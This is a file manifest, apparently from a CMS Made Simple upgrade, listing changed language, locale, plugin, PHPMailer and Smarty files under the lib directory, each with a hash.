CHANGED :: 98f7c4a7d40237538bb2ac9fb6556e77 :: \lib\lang\cms_selflink\ext\ar_AR.php
CHANGED :: 468e450fe24f6c2a6f07534c95c19ae2 :: \lib\lang\cms_selflink\ext\cs_CZ.php
CHANGED :: e9b72631dc967ffee82c5835809c5cef :: \lib\lang\cms_selflink\ext\da_DK.php
CHANGED :: 38643fc9a5100a3bc0113bd0badec15e :: \lib\lang\cms_selflink\ext\de_DE.php
CHANGED :: aa3eca872de9458d83d70655ceb43e14 :: \lib\lang\cms_selflink\ext\en_CY.php
CHANGED :: de81a7a11545ade5f31e1c149e4d7682 :: \lib\lang\cms_selflink\ext\es_ES.php
CHANGED :: 009de050ad4f13fa58060b16fdef61dc :: \lib\lang\cms_selflink\ext\et_EE.php
CHANGED :: fbe990a0bc460847c30040014c2c501f :: \lib\lang\cms_selflink\ext\fa_FA.php
CHANGED :: edb67547b64324df973aad1b8a859bbf :: \lib\lang\cms_selflink\ext\fi_FI.php
CHANGED :: 9975b3b5f9f23ce93d44c545300ab5d1 :: \lib\lang\cms_selflink\ext\fr_FR.php
CHANGED :: ee941196508be5d2cd81a0a0d3648d93 :: \lib\lang\cms_selflink\ext\gl_GL.php
CHANGED :: 11f167211b768a5e22fbaaade91b5671 :: \lib\lang\cms_selflink\ext\hr_HR.php
CHANGED :: 2dbdee95bdd6d3aa3fee93ca8a513c2b :: \lib\lang\cms_selflink\ext\hu_HU.php
CHANGED :: ea3fcd063aa1c772a43d08daceb4306b :: \lib\lang\cms_selflink\ext\id_ID.php
CHANGED :: 21d715f393ffd0b4252689cd2ab311d9 :: \lib\lang\cms_selflink\ext\it_IT.php
CHANGED :: 2be00fb14d1be7afa980f09f039deeb5 :: \lib\lang\cms_selflink\ext\lt_LT.php
CHANGED :: cd8202ef1a8877ebc62549e26afd64e1 :: \lib\lang\cms_selflink\ext\nb_NO.php
CHANGED :: e9a35a81ec9c52c8560588021bc4c043 :: \lib\lang\cms_selflink\ext\nl_NL.php
CHANGED :: 3a48e893d127ca33899aef0130a182f8 :: \lib\lang\cms_selflink\ext\pl_PL.php
CHANGED :: cc13583a51bf82ae3d969cde45af9af9 :: \lib\lang\cms_selflink\ext\pt_BR.php
CHANGED :: e94727dddc4e80e51472787cf43d2029 :: \lib\lang\cms_selflink\ext\pt_PT.php
CHANGED :: 6463ea86cdd7e81e2f53e7ea04711cb1 :: \lib\lang\cms_selflink\ext\ro_RO.php
CHANGED :: 4d143cd83e04ac36ce2723014b0ce93b :: \lib\lang\cms_selflink\ext\ru_RU.php
CHANGED :: 2a9ef3f4795887fd2dc475ede0bdcfb9 :: \lib\lang\cms_selflink\ext\sk_SK.php
CHANGED :: 9c964875a06c8022a08cdd94d6173825 :: \lib\lang\cms_selflink\ext\sl_SI.php
CHANGED :: 782763ffa3628f3cb97b7628508addf3 :: \lib\lang\cms_selflink\ext\sr_YU.php
CHANGED :: 63510596e5b0639ec82193199e7e5bbd :: \lib\lang\cms_selflink\ext\sv_SE.php
CHANGED :: 4572742844d9ec9f20d6a7dd94a0bf47 :: \lib\lang\cms_selflink\ext\tr_TR.php
CHANGED :: 26ec072af260a5bc93403ef89f2c44c9 :: \lib\lang\cms_selflink\ext\vi_VN.php
CHANGED :: c85d2a860c0ac2cab7c7fe70691c46d7 :: \lib\lang\cms_selflink\ext\zh_TW.php
CHANGED :: 10fba4c8dc09e9e952c2b8f6e54217d8 :: \lib\lang\help\en_US.php
CHANGED :: ac23e4e19a44f2cac5490ccf9b8edacf :: \lib\lang\help\ext\de_DE.php
CHANGED :: 3efa410e120627ad076b150d13003004 :: \lib\lang\help\ext\fr_FR.php
CHANGED :: 83559a203be2b7870fba501b866b3ed4 :: \lib\lang\help\ext\it_IT.php
CHANGED :: bfd17e5b32c06a3a6582dfbd9a097b79 :: \lib\lang\help\ext\nb_NO.php
CHANGED :: 51028dde2d3082c2cd5c1a50669c62ba :: \lib\lang\help\ext\ru_RU.php
CHANGED :: 99647d362d637ff93ab172f68bc4e82b :: \lib\lang\help\ext\uk_UA.php
CHANGED :: 1ea9e0467fd5a86650e371381aaa5e8e :: \lib\lang\tags\en_US.php
CHANGED :: 27fee779f3ed1c7111b715b13e0a65b9 :: \lib\lang\tags\ext\de_DE.php
CHANGED :: 28599e0a29bbf42197644585c1ad6a49 :: \lib\lang\tags\ext\fr_FR.php
CHANGED :: 3be51fda9b6b2f44c98d99aeaed1a42c :: \lib\lang\tags\ext\it_IT.php
CHANGED :: aba95107ee33ef4ee52d2b1d4b01a6f3 :: \lib\lang\tags\ext\nb_NO.php
CHANGED :: 582758834e74c7cb1b7e20e4b973e3d7 :: \lib\lang\tags\ext\pt_PT.php
CHANGED :: a3a8d48984068f897f4ab33e91ebfc46 :: \lib\lang\tags\ext\ru_RU.php
CHANGED :: 452925d5182994846dbe3b9518db84d8 :: \lib\lang\tags\ext\tr_TR.php
CHANGED :: 03098d104fb54adc9816ba549c6bf956 :: \lib\lang\tags\ext\uk_UA.php
CHANGED :: 9980a97c336655eadbf2b5fe84aded10 :: \lib\lang\tasks\en_US.php
CHANGED :: 0c1c2cb62a3162bf12b2225f4551bd62 :: \lib\lang\tasks\ext\ar_AR.php
CHANGED :: 6495aa0987c1208965f5e8a93d92dfb7 :: \lib\lang\tasks\ext\cs_CZ.php
CHANGED :: ff568c963cc707975b4d4bde49a5f6ca :: \lib\lang\tasks\ext\da_DK.php
CHANGED :: a64a5f769d4c283277fcbd44de7c68ea :: \lib\lang\tasks\ext\de_DE.php
CHANGED :: 9eadfab683bb66ae2e66ccdabf46e2aa :: \lib\lang\tasks\ext\en_CY.php
CHANGED :: a38332691a954259e90ebbee9e5a7e51 :: \lib\lang\tasks\ext\es_ES.php
CHANGED :: 2ea4c478c3bd1ae5e9a3346503d55373 :: \lib\lang\tasks\ext\et_EE.php
CHANGED :: 941fa1e4861908383ff6d1317a26814b :: \lib\lang\tasks\ext\fa_FA.php
CHANGED :: 132dfaa369e11cea9571b00ca3909b7d :: \lib\lang\tasks\ext\fi_FI.php
CHANGED :: 24793276f5e534d7830e7e550eb63074 :: \lib\lang\tasks\ext\fr_FR.php
CHANGED :: f27f991e7e815d7160d65d417130bfb7 :: \lib\lang\tasks\ext\gl_GL.php
CHANGED :: 4ab088a39090c1462af7d3f3a7b8f395 :: \lib\lang\tasks\ext\hr_HR.php
CHANGED :: 39e91380df215f3c17d1b1e81dd46d25 :: \lib\lang\tasks\ext\hu_HU.php
CHANGED :: 8af62674272115d72239e1ecc58eec3d :: \lib\lang\tasks\ext\it_IT.php
CHANGED :: 398b5d7b431aa963788be32cf04b73de :: \lib\lang\tasks\ext\ja_JP.php
CHANGED :: a18220aa846182a7de3116edfe8ed604 :: \lib\lang\tasks\ext\lt_LT.php
CHANGED :: c023af264e68bdd2d7c69a8e50171d4c :: \lib\lang\tasks\ext\nb_NO.php
CHANGED :: 17822b85970829f13b84fe80c9d5134a :: \lib\lang\tasks\ext\nl_NL.php
CHANGED :: 2fcbdd8502eed355c49823c2a3aa57a4 :: \lib\lang\tasks\ext\pl_PL.php
CHANGED :: 3880413689afa7a557eea7217b73bd8a :: \lib\lang\tasks\ext\pt_BR.php
CHANGED :: 0a821bc3a744b5c581a37644654bd4dc :: \lib\lang\tasks\ext\pt_PT.php
CHANGED :: 5e01f82d5181381bafeaa1b27ab50549 :: \lib\lang\tasks\ext\rm_CH.php
CHANGED :: c95aac22ae4fca11cc471f3e0e181458 :: \lib\lang\tasks\ext\ro_RO.php
CHANGED :: 088e4169ae4a0015f006fef2c3f45e14 :: \lib\lang\tasks\ext\ru_RU.php
CHANGED :: ca4583b8df578af0c589c852b4b0b0c0 :: \lib\lang\tasks\ext\sk_SK.php
CHANGED :: 9ad5bd2b44306c2125b629e0f225cdb2 :: \lib\lang\tasks\ext\sl_SI.php
CHANGED :: 3cd875faf587096bd4987d6accc44a45 :: \lib\lang\tasks\ext\sr_YU.php
CHANGED :: fffb809e6be0ff8db3d6951645d25044 :: \lib\lang\tasks\ext\sv_SE.php
CHANGED :: 7b9e8bdf58f213bea6bc025721fe4055 :: \lib\lang\tasks\ext\tr_TR.php
CHANGED :: 5a57b51ca9cdc8e40956914f1a933f6c :: \lib\lang\tasks\ext\vi_VN.php
CHANGED :: a1a516c9465f201ebe24514e0a33eff2 :: \lib\lang\tasks\ext\zh_TW.php
CHANGED :: 81f19c46f063c7919f4cbed7f33511ef :: \lib\misc.functions.php
CHANGED :: 26383b1df50194b7676862af17e11b0d :: \lib\module.functions.php
CHANGED :: 08332ec844b1d53d2ff1ea045c96f4c4 :: \lib\nls\af_ZA.nls.php
CHANGED :: 3cee3ed3859d4b2a2bcc6fca9b3a7361 :: \lib\nls\ar_AR.nls.php
CHANGED :: d4461853f2e9269a02fb0a1803bbc586 :: \lib\nls\bg_BG.nls.php
CHANGED :: 34c2d66fd6d6f7cd2c7eedd38a82f4eb :: \lib\nls\ca_ES.nls.php
CHANGED :: 0e91be42f8273006d43fe107621bf86f :: \lib\nls\cs_CZ.nls.php
CHANGED :: 0d6cd2886791602d94c3d6a30de8e218 :: \lib\nls\da_DK.nls.php
CHANGED :: ededf6b91385dcf2f10b5c9e11ca4250 :: \lib\nls\de_DE.nls.php
CHANGED :: 2293fd9e1a60c3ff4756edf0feaa1359 :: \lib\nls\el_GR.nls.php
CHANGED :: 865266bd346cf525fcb24a916aa20257 :: \lib\nls\en_CY.nls.php
CHANGED :: f70938de71577d6477da58c14b7ef758 :: \lib\nls\en_US.nls.php
CHANGED :: dc74ed475dac34fe85f3c0559449af29 :: \lib\nls\es_ES.nls.php
CHANGED :: 3ce97dab0b1df1062db8dd9229fd53d3 :: \lib\nls\et_EE.nls.php
CHANGED :: 68b6d5e546f5c7acc162e434d9691ffd :: \lib\nls\eu_ES.nls.php
CHANGED :: 9abb3269c560f68ecd60fbf3a26cb94a :: \lib\nls\fa_IR.nls.php
CHANGED :: baf9fc4f8db8f86ba7100d18726b447a :: \lib\nls\fi_FI.nls.php
CHANGED :: d743a9cdfba15a77a0f2b62851874705 :: \lib\nls\fr_FR.nls.php
CHANGED :: 251f23d3350537db76142127122250c4 :: \lib\nls\hr_HR.nls.php
CHANGED :: 22204de726a983a11647a4694ecd8ef7 :: \lib\nls\hu_HU.nls.php
CHANGED :: 3a2027c41dbafc1341f7309bc3beffeb :: \lib\nls\id_ID.nls.php
CHANGED :: 8cbf68b7b2221a91f72fa1f8a16a70aa :: \lib\nls\is_IS.nls.php
CHANGED :: 1191b644dca098d44f5d0893825797f8 :: \lib\nls\it_IT.nls.php
CHANGED :: f9cd2093e89050f152d43bd725c5f43f :: \lib\nls\ja_JP.nls.php
CHANGED :: 37aab5367d0117c0203b8ebaa1a8b0de :: \lib\nls\kz_KZ.nls.php
CHANGED :: f7e09bbeac1b343f8e449127a2178df4 :: \lib\nls\lt_LT.nls.php
CHANGED :: 6e7cee8783be747f6b5addad12aeff8a :: \lib\nls\nb_NO.nls.php
CHANGED :: a015e716c552862cc18dc298a3e6a4ca :: \lib\nls\nl_NL.nls.php
CHANGED :: 4ea9836cd5ff4542060fc2f606d4397f :: \lib\nls\pl_PL.nls.php
CHANGED :: f25879a4446597b946e26fe25b45c389 :: \lib\nls\pt_BR.nls.php
CHANGED :: 68e490c564233ab1c2686810a99345aa :: \lib\nls\pt_PT.nls.php
CHANGED :: 661d56ba9913d33c508b060d6ed551fb :: \lib\nls\ro_RO.nls.php
CHANGED :: 333f11561029acb85ce249f6914199c5 :: \lib\nls\ru_RU.nls.php
CHANGED :: 8cac4113da3733aca59a9461fff2e351 :: \lib\nls\sk_SK.nls.php
CHANGED :: b7a3d1d0b3ee7986cf6eccc022357c0a :: \lib\nls\sl_SI.nls.php
CHANGED :: 12897149d84115830d2d89e0016df40c :: \lib\nls\sr_YU.nls.php
CHANGED :: babf7f29bb0da27ca3564320ec57cc4b :: \lib\nls\sv_SE.nls.php
CHANGED :: acb086aa1e258974ec8df7c00fe4a5bd :: \lib\nls\tr_TR.nls.php
CHANGED :: 83d781aca320717f1c7cdd71ea13b563 :: \lib\nls\uk_UA.nls.php
CHANGED :: 19d66dc7967ce7285020bd3d2defc36a :: \lib\nls\zh_CN.nls.php
CHANGED :: 73d05169e91d071930555f31d09c31a0 :: \lib\nls\zh_TW.nls.php
CHANGED :: 84ca4fa3e7cd9b59b2b485a9eba98da3 :: \lib\page.functions.php
CHANGED :: 5f82ddb79ecc6e6c8f103a017f572a49 :: \lib\phpmailer\composer.json
CHANGED :: 46dcd505d56a950198d9aa84385f94a2 :: \lib\phpmailer\language\phpmailer.lang-am.php
CHANGED :: b4b8bb573df63969ef6fc53c5c60a611 :: \lib\phpmailer\language\phpmailer.lang-ar.php
CHANGED :: 74f02d99fee297a3bcb83608f087769b :: \lib\phpmailer\language\phpmailer.lang-az.php
CHANGED :: a34eaaa02c21ea4abfaba2ad9818f1c0 :: \lib\phpmailer\language\phpmailer.lang-be.php
CHANGED :: 9aa86adbd82a847efb273ac6efff2c64 :: \lib\phpmailer\language\phpmailer.lang-bg.php
CHANGED :: 6a332f400db88a50dd4cd8fa8699b245 :: \lib\phpmailer\language\phpmailer.lang-ca.php
CHANGED :: ca845e23a375b913250553cb096660a9 :: \lib\phpmailer\language\phpmailer.lang-ch.php
CHANGED :: fc4c9b063cda1814edfe6e0ad16c7d3b :: \lib\phpmailer\language\phpmailer.lang-cs.php
CHANGED :: 5ac584c76a057c6bf52bfd7147172bf1 :: \lib\phpmailer\language\phpmailer.lang-da.php
CHANGED :: de470fc25bbaae789bb886bf539a6bc6 :: \lib\phpmailer\language\phpmailer.lang-de.php
CHANGED :: 42e7ce0debd01fee461199911426e822 :: \lib\phpmailer\language\phpmailer.lang-el.php
CHANGED :: b05085bf17dc2350d4974c90c2927cc6 :: \lib\phpmailer\language\phpmailer.lang-eo.php
CHANGED :: 2585f10507f6bf809fb8b1b2cbcdfd80 :: \lib\phpmailer\language\phpmailer.lang-es.php
CHANGED :: 55cfa54c2c3e034b9e50b9199b68a0b9 :: \lib\phpmailer\language\phpmailer.lang-et.php
CHANGED :: ee323ce1ce6547b45ff18d21754925c7 :: \lib\phpmailer\language\phpmailer.lang-fa.php
CHANGED :: dfdd0e7cce7ad8d9f111a37758f081ef :: \lib\phpmailer\language\phpmailer.lang-fi.php
CHANGED :: 0f4c3dd73b3dc53f116174886ca663a3 :: \lib\phpmailer\language\phpmailer.lang-fo.php
CHANGED :: e53bf5780b0f7f821d821e8fdd4775d7 :: \lib\phpmailer\language\phpmailer.lang-fr.php
CHANGED :: 0e5d759a67cc55ea905313bf5f9360e6 :: \lib\phpmailer\language\phpmailer.lang-gl.php
CHANGED :: cb25a67cf175aca511c9f0e0cbb6c915 :: \lib\phpmailer\language\phpmailer.lang-he.php
CHANGED :: c7bf676ddc14d768c6be95c603dc4cbb :: \lib\phpmailer\language\phpmailer.lang-hr.php
CHANGED :: 781de42221ea82a8d04ebe4eae469ffe :: \lib\phpmailer\language\phpmailer.lang-hu.php
CHANGED :: c5e697c6e5f7ed417013ed30b3144453 :: \lib\phpmailer\language\phpmailer.lang-id.php
CHANGED :: 15a1fdbd970fccac0f03765e5702a6c6 :: \lib\phpmailer\language\phpmailer.lang-it.php
CHANGED :: 14bddd9f59ca7209832c484be124e9df :: \lib\phpmailer\language\phpmailer.lang-ja.php
CHANGED :: 693af2da3a7837d6c2ce877a6296c9fa :: \lib\phpmailer\language\phpmailer.lang-ka.php
CHANGED :: c95e8ca9669773f869b54ad91f2df771 :: \lib\phpmailer\language\phpmailer.lang-ko.php
CHANGED :: a1db8ce612b6a47aaa32635d66aa6147 :: \lib\phpmailer\language\phpmailer.lang-lt.php
CHANGED :: a9a3d00075ac3e83c74e43a394dfba54 :: \lib\phpmailer\language\phpmailer.lang-lv.php
CHANGED :: b6f645dcc927bf4cc12f2db7b108be0c :: \lib\phpmailer\language\phpmailer.lang-ms.php
CHANGED :: 5fb55ff6709d5d7e111fd0a16d720bc8 :: \lib\phpmailer\language\phpmailer.lang-nb.php
CHANGED :: 64ebeec65b9d7a508b1922bcf1c4f342 :: \lib\phpmailer\language\phpmailer.lang-nl.php
CHANGED :: c4a91d45b16df7f8b37bd0fd6d29a405 :: \lib\phpmailer\language\phpmailer.lang-pl.php
CHANGED :: 1d404a5c7e7c76962289e2ee67a825af :: \lib\phpmailer\language\phpmailer.lang-pt.php
CHANGED :: 6ad4b4cb098d6cbdb5f81141b7d021fd :: \lib\phpmailer\language\phpmailer.lang-pt_br.php
CHANGED :: 5a7250cc3225f316ebd1d975e2d60a1d :: \lib\phpmailer\language\phpmailer.lang-ro.php
CHANGED :: c7007738ef7c186bf189c451e25baa0d :: \lib\phpmailer\language\phpmailer.lang-ru.php
CHANGED :: 7614ab16cd7a50a85b34d910b0f5e466 :: \lib\phpmailer\language\phpmailer.lang-sk.php
CHANGED :: 61da032ff1013433e51ff17a922644d3 :: \lib\phpmailer\language\phpmailer.lang-sl.php
CHANGED :: de2480c0d69392481b31819faa367aa2 :: \lib\phpmailer\language\phpmailer.lang-sr.php
CHANGED :: 8cf5b8932ed804db48768075f1950e57 :: \lib\phpmailer\language\phpmailer.lang-sv.php
CHANGED :: 1ca201bf0296d48dde2d48159605eade :: \lib\phpmailer\language\phpmailer.lang-tr.php
CHANGED :: dd92241bba4087a70ce50c99ef16dd4a :: \lib\phpmailer\language\phpmailer.lang-uk.php
CHANGED :: b98d51c1f17b610fed45013e58bd1701 :: \lib\phpmailer\language\phpmailer.lang-vi.php
CHANGED :: 05274f5c2fc2da491392f5b9e3f859e6 :: \lib\phpmailer\language\phpmailer.lang-zh.php
CHANGED :: 7ace3306516a4590b85a792f0c209e66 :: \lib\phpmailer\language\phpmailer.lang-zh_cn.php
CHANGED :: 23c2a5e0106b99d75238986559bb5fc6 :: \lib\phpmailer\LICENSE
CHANGED :: e330c48656444406579e9a67ad27107f :: \lib\phpmailer\VERSION
CHANGED :: 5d73dc8a63cbf9e738f19cefdb64aaaa :: \lib\plugins\function.anchor.php
CHANGED :: 9837d9e73046ba92286c43d7196cac43 :: \lib\plugins\function.breadcrumbs.php
CHANGED :: f04aa8005577b2f60d6d91ce18c87bd8 :: \lib\plugins\function.browser_lang.php
CHANGED :: 8b8ba737e7a9f85f976a549da4893c56 :: \lib\plugins\function.cms_action_url.php
CHANGED :: 06cc3e70cdd17c41b2312e74a83b7cc9 :: \lib\plugins\function.cms_get_language.php
CHANGED :: c8cc20a4831ca6a73c8432dbec48e5bc :: \lib\plugins\function.cms_html_options.php
CHANGED :: 705e7f5a0d8f49591d6aad2baef59d45 :: \lib\plugins\function.cms_init_editor.php
CHANGED :: 6833e12dfc1275f9a5a7b58f4e986ccd :: \lib\plugins\function.cms_jquery.php
CHANGED :: f5cd8fd542c8dd90036fc2a756b09d82 :: \lib\plugins\function.cms_lang_info.php
CHANGED :: 88393c82967da79ec106a3933d9ee6f3 :: \lib\plugins\function.cms_module.php
CHANGED :: abfbba9bee5df7b4e78bc0a7558b4399 :: \lib\plugins\function.cms_module_hint.php
CHANGED :: a5ca64d8a1b926479d5e175160607558 :: \lib\plugins\function.cms_pageoptions.php
CHANGED :: fc5e12254e3328f0f5dddd7f2c17dcc7 :: \lib\plugins\function.cms_selflink.php
CHANGED :: 58175f53a85656083efda1a088a4db60 :: \lib\plugins\function.cms_set_language.php
CHANGED :: f22bf97e8f78ea2fe449c1232945a05e :: \lib\plugins\function.cms_stylesheet.php
CHANGED :: e9733e85719bdac992e6fd5d649d189c :: \lib\plugins\function.cms_textarea.php
CHANGED :: d1846b6e4207f30c97cf91fbdf62a6c2 :: \lib\plugins\function.cms_version.php
CHANGED :: 5ceaa2ad55f5e53098ec0794117d1027 :: \lib\plugins\function.cms_versionname.php
CHANGED :: 1d313001d1a51b78440913ca6e520d9c :: \lib\plugins\function.cms_yesno.php
CHANGED :: abaab409a5c7729c4424e5d142d28385 :: \lib\plugins\function.created_date.php
CHANGED :: cf1effe39996c1134f78fd00af5c6576 :: \lib\plugins\function.current_date.php
CHANGED :: 2f08210cfd303a7dc6dad28274563dee :: \lib\plugins\function.description.php
CHANGED :: 9ead0792abeb5c9c70c76fd11af00413 :: \lib\plugins\function.dump.php
CHANGED :: e6751c76529817dfbb0f55c174da8241 :: \lib\plugins\function.file_url.php
CHANGED :: 73f7b4e3090f85641670261fb4f068cb :: \lib\plugins\function.form_end.php
CHANGED :: 218a18f94a6886a059402dcf0f3f9dcd :: \lib\plugins\function.form_start.php
CHANGED :: 750e6a5c01ab52a72b7240f344cdebf1 :: \lib\plugins\function.get_template_vars.php
CHANGED :: b9e40824865489ea344e80a4243f5bb0 :: \lib\plugins\function.global_content.php
CHANGED :: e17efd49d9a8054b0c0f3d5f4308bb44 :: \lib\plugins\function.image.php
CHANGED :: 151fc18a35172447f1b46c275ca3df25 :: \lib\plugins\function.last_modified_by.php
CHANGED :: fd48dd6ad8ce670caf5edaa2fd3e03b8 :: \lib\plugins\function.menu_text.php
CHANGED :: 264d2b747984c6d37d4551eb334fb1b0 :: \lib\plugins\function.metadata.php
CHANGED :: 8062b0e9bbf9f71b937f43aba3da9c6b :: \lib\plugins\function.modified_date.php
CHANGED :: 15268eb9725308afb19c3194a20a5ee0 :: \lib\plugins\function.module_available.php
CHANGED :: eabf7d26e1e286edb047eb916f21b985 :: \lib\plugins\function.page_attr.php
CHANGED :: ff838ed251701d4cf7c6257afb88eba2 :: \lib\plugins\function.page_image.php
CHANGED :: 94c989d7d5221fb8f134c90a0e65d594 :: \lib\plugins\function.recently_updated.php
CHANGED :: 172d99a93c16d07c6da03aa07a6751be :: \lib\plugins\function.redirect_page.php
CHANGED :: d71a68e67309069e8bf89fae666b85e7 :: \lib\plugins\function.redirect_url.php
CHANGED :: d4bc12f2f710242a48588998da22c245 :: \lib\plugins\function.repeat.php
CHANGED :: 5378c49fef2795fe8107d59a76ed30ab :: \lib\plugins\function.root_url.php
CHANGED :: de2e2fe1c6d2d7e7bcf5cdcc2294d8b8 :: \lib\plugins\function.setlist.php
CHANGED :: 175a6ec1a0a3475e735a8540cc9e5391 :: \lib\plugins\function.share_data.php
CHANGED :: 5be3e6f6b6441a081960b8b83cf7cc39 :: \lib\plugins\function.sitename.php
CHANGED :: 1dcec5f4834e744c421dc7229f2d3e6f :: \lib\plugins\function.site_mapper.php
CHANGED :: ae2eecedcae7da3f0b721faa8bb47a2e :: \lib\plugins\function.thumbnail_url.php
CHANGED :: d44678c065ada3f1bac8e5d69b123e27 :: \lib\plugins\function.title.php
CHANGED :: eab68463d3d676d007e3457502147439 :: \lib\plugins\function.uploads_url.php
CHANGED :: 5a40e1c1d2295b758c4892831b0f66c3 :: \lib\plugins\modifier.cms_date_format.php
CHANGED :: 95d41847d7013bc4260c913c103af16d :: \lib\plugins\modifier.cms_escape.php
CHANGED :: 1c59a3f7137d210a90785140698efc8c :: \lib\plugins\modifier.localedate_format.php
CHANGED :: 762f140fe319816dcc0c71cf2962a650 :: \lib\plugins\modifier.relative_time.php
CHANGED :: 98ccc47a57c8c01cfea300b15d6ff7c7 :: \lib\plugins\modifier.summarize.php
CHANGED :: 2617d67762fc6496fccc8186d2c25ffc :: \lib\plugins\postfilter.postcompilefunc.php
CHANGED :: a2f3666831b19b08887372f61c1486dc :: \lib\plugins\prefilter.precompilefunc.php
CHANGED :: ad58889dd4e26fd78e99396d3ea10c90 :: \lib\smarty\Autoloader.php
CHANGED :: 7633b7daba08cae57f229d57e94cb04b :: \lib\smarty\bootstrap.php
CHANGED :: f817ee0cb2672073c30d6a2bcdc56a91 :: \lib\smarty\debug.tpl
CHANGED :: 1e6b2abb7c1ba48613c9fa278f753b2a :: \lib\smarty\plugins\block.textformat.php
CHANGED :: d48779c7ffa450d271dfd38d390ccbc8 :: \lib\smarty\plugins\function.counter.php
CHANGED :: d632294b8985c49a9d0cbddba379f73f :: \lib\smarty\plugins\function.cycle.php
CHANGED :: 77b5b45f0d3cf7ecf535168eebe90cc7 :: \lib\smarty\plugins\function.fetch.php
CHANGED :: b4201c271d349f4c0e4f643ab78b3545 :: \lib\smarty\plugins\function.html_checkboxes.php
CHANGED :: 2337674618708ec00376cffcd24654b0 :: \lib\smarty\plugins\function.html_image.php
CHANGED :: 5f56eef1093a8ab85555a184b0084679 :: \lib\smarty\plugins\function.html_options.php
CHANGED :: 8f987aef6b345ad733bc912d2b5316e7 :: \lib\smarty\plugins\function.html_radios.php
CHANGED :: a392027fc3e35f1854e92b1e4048ea7d :: \lib\smarty\plugins\function.html_select_date.php
CHANGED :: 635611970373c93f4901bf790e07d41e :: \lib\smarty\plugins\function.html_select_time.php
CHANGED :: 43aa0ba9e2c899ad93b9ceb9a1bf4484 :: \lib\smarty\plugins\function.html_table.php
CHANGED :: af61d72be8dff2d2710c57af760227bf :: \lib\smarty\plugins\function.mailto.php
CHANGED :: 1b8fafdd36fa85257a66e51ef3e44447 :: \lib\smarty\plugins\function.math.php
CHANGED :: 5319c6c7e50974933344640eca1ef40f :: \lib\smarty\plugins\modifier.capitalize.php
CHANGED :: 8dfd46686cce51be34ae68ae8c8516aa :: \lib\smarty\plugins\modifier.date_format.php
CHANGED :: 0ce26ab8773c2b140e20472d389b8c95 :: \lib\smarty\plugins\modifier.debug_print_var.php
CHANGED :: d43b5174a0983b0c5d58662dbeac8b17 :: \lib\smarty\plugins\modifier.escape.php
CHANGED :: 8967eacc8c149c89fb2ee6ec3c00f7cf :: \lib\smarty\plugins\modifier.regex_replace.php
CHANGED :: adf2daa7093d18bf70cab4006e21775f :: \lib\smarty\plugins\modifier.replace.php
CHANGED :: b717bf194a1c12d0f6784d0074802a78 :: \lib\smarty\plugins\modifier.spacify.php
CHANGED :: abceebd0c38ebb0cf77f07832a6602f4 :: \lib\smarty\plugins\modifier.truncate.php
CHANGED :: 6f6d44b0facb92b872154680d71f2638 :: \lib\smarty\plugins\modifiercompiler.cat.php
CHANGED :: c046da5b436eec8a2a042b9878a06c05 :: \lib\smarty\plugins\modifiercompiler.count_characters.php
CHANGED :: d280f54cdc2816f5b6d6d22481c334ec :: \lib\smarty\plugins\modifiercompiler.count_paragraphs.php
CHANGED :: 54233ffb48e6c5f00fbca959168e12e4 :: \lib\smarty\plugins\modifiercompiler.count_sentences.php
CHANGED :: c5e3f94e773958ed46a6266fcca6e47c :: \lib\smarty\plugins\modifiercompiler.count_words.php
CHANGED :: 88ed29e0012284ce15ded1564313b4b1 :: \lib\smarty\plugins\modifiercompiler.default.php
CHANGED :: ad2ed9ff3472bbcd79cfa7498e35cee5 :: \lib\smarty\plugins\modifiercompiler.escape.php
CHANGED :: bb86cb92ca9b729d66de54dfa22613a7 :: \lib\smarty\plugins\modifiercompiler.from_charset.php
CHANGED :: 3c34f320a6514e7282cecc285f300504 :: \lib\smarty\plugins\modifiercompiler.indent.php
CHANGED :: 6cd1fc185edade36945ee8e2e6fdf911 :: \lib\smarty\plugins\modifiercompiler.lower.php
CHANGED :: 14e171730b05e42873d263b1857a2d98 :: \lib\smarty\plugins\modifiercompiler.noprint.php
CHANGED :: 9675a9cf27ce45b98f6d438c933f32e4 :: \lib\smarty\plugins\modifiercompiler.string_format.php
CHANGED :: fd6365e3be41a627288a1eb144251ed2 :: \lib\smarty\plugins\modifiercompiler.strip.php
CHANGED :: 82e91961cf8423329ea6045112a3faad :: \lib\smarty\plugins\modifiercompiler.strip_tags.php
CHANGED :: b8ebf6a7e2580f1e082278b0dea89a82 :: \lib\smarty\plugins\modifiercompiler.to_charset.php
CHANGED :: 696d0ff1b031413049ac44eb6a52e867 :: \lib\smarty\plugins\modifiercompiler.unescape.php
CHANGED :: 9a6dfe78d6abf56463c14fb21ffe8339 :: \lib\smarty\plugins\modifiercompiler.upper.php
CHANGED :: 1c98084ed4b3988c2fad1c074a77b7a9 :: \lib\smarty\plugins\modifiercompiler.wordwrap.php
CHANGED :: 97e7f4554ab0557c2430b5c73592d8a1 :: \lib\smarty\plugins\outputfilter.trimwhitespace.php
CHANGED :: 9003a0e07199fe9fc5cb0ce6fb284e0d :: \lib\smarty\plugins\shared.escape_special_chars.php
CHANGED :: 8a0f9434b633a5b130dd3719262fc61d :: \lib\smarty\plugins\shared.literal_compiler_param.php
CHANGED :: 1c3ed818b928c87f195e7f40fad620ac :: \lib\smarty\plugins\shared.make_timestamp.php
CHANGED :: 3cf9b1383d0c8998581421619f85444c :: \lib\smarty\plugins\shared.mb_str_replace.php
CHANGED :: 4834f8567f9086d28296f4f555538bfa :: \lib\smarty\plugins\shared.mb_unicode.php
CHANGED :: 5e9496f8f329c802c1efe50181c4fc39 :: \lib\smarty\plugins\variablefilter.htmlspecialchars.php
CHANGED :: 3bf5afd51e97467c89951d4451975a6e :: \lib\smarty\Smarty.class.php
CHANGED :: 05656321ccd145cd2614e0b63597b7ba :: \lib\smarty\sysplugins\smartycompilerexception.php
CHANGED :: f3dc84c2ca14062d8f9140cad49800f3 :: \lib\smarty\sysplugins\smartyexception.php
CHANGED :: 15c55cda336fc8d48cd231b4a26148bf :: \lib\smarty\sysplugins\smarty_cacheresource.php
CHANGED :: e3a3b5381cedd32c391216cd86831af2 :: \lib\smarty\sysplugins\smarty_cacheresource_custom.php
CHANGED :: c328ad816c98f96f7ea2c10a3e7b53fb :: \lib\smarty\sysplugins\smarty_cacheresource_keyvaluestore.php
CHANGED :: 94b9023aa792c4c8eaa87882b50a9c38 :: \lib\smarty\sysplugins\smarty_data.php
CHANGED :: 5e4e0af80c24da43b971c80d09c281d3 :: \lib\smarty\sysplugins\smarty_internal_block.php
CHANGED :: e24ce2b2a380a0a39509bec1f7b6dc56 :: \lib\smarty\sysplugins\smarty_internal_cacheresource_file.php
